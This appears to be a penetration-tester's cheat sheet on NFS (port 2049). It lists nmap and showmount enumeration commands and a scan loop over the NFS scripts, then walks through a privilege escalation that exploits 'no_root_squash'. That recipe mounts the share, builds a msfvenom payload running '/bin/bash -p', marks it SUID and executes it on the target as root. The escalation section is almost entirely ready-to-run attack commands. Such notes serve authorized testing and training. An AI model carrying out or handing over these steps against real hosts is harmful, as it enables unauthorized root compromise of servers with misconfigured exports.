NFS
Network File System - Port 2049
Allows a user on a client computer to access files over a network as if it were local
nmap -sV -script=nfs-showmount <tgt>
showmount -e <tgt>NFS - Find and Enum
nmap -v -p 111 10.x.x.0/24 -oG nfs.nmap
cat nfs.nmap | grep 111 | grep -v "Nmap" | awk '{print $2}' > nfs.ip
nmap -sV -p111 --script=rpcinfo -iL nfs.ip
ls -l /usr/share/nmap/scripts/nfs*
nmap -p111 --script nfs* -iL nfs.ip nfs.enumNFS - Sweep
Wildcard NSE didnt work well
Better to run NSE individually or as a Loop
> nmap -sV -p111,2049 10.x.x.0/24 -oG nfs.nmap
> grep open nfs.nmap | cut -d' ' -f2 > nfs.ip
> nmap -sV -p111,2049 --script=rpcinfo -iL nfs.ip -oN rpc_scripts.nmap
> nmap -sV -p111 --script=nfs* -iL nfs.ip -oN nfs_scripts2.nmap
> for vuln in $(ls -1 /usr/share/nmap/scripts/nfs* | cut -d "/" -f6);
do nmap -p 111 --script $vuln 10.11.1.72; done
NFS Root Squashing
Network File System
Send a rootbash over NFS with local root impersonating remote root
Only works if "no_root_squash" is setup
Remote users can: mount/access/create/modify files
Default: Created files inherit remote user/group ID
Even if not on the NFS server
How NFS protects obvious privesc
If remote user claims to be root uid=0
NFS will squash and treat as a nobody
Feature can be disabled!
REF: TarBackups
-------------------------
showmount -e <tgt>
nmap -sV -script=nfs-showmount <tgt>
mount -o rw,vers=2 <tgt>:<share> <localdir>
-------------------------
lse.sh -l 2 -i ..found nfs share
cat /etc/exports
/tmp *(rw,sync,no_root_squash)
-------------------------
Local:
showmount -e 192.x.y.z
mkdir /tmp/nfs
mount -o rw,vers=2 192.x.y.z:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
-------------------------
Target:
ls -l /tmp ..owned by root, with suid
/tmp/shell.elf ..executed as root
root!!Last updated
Was this helpful?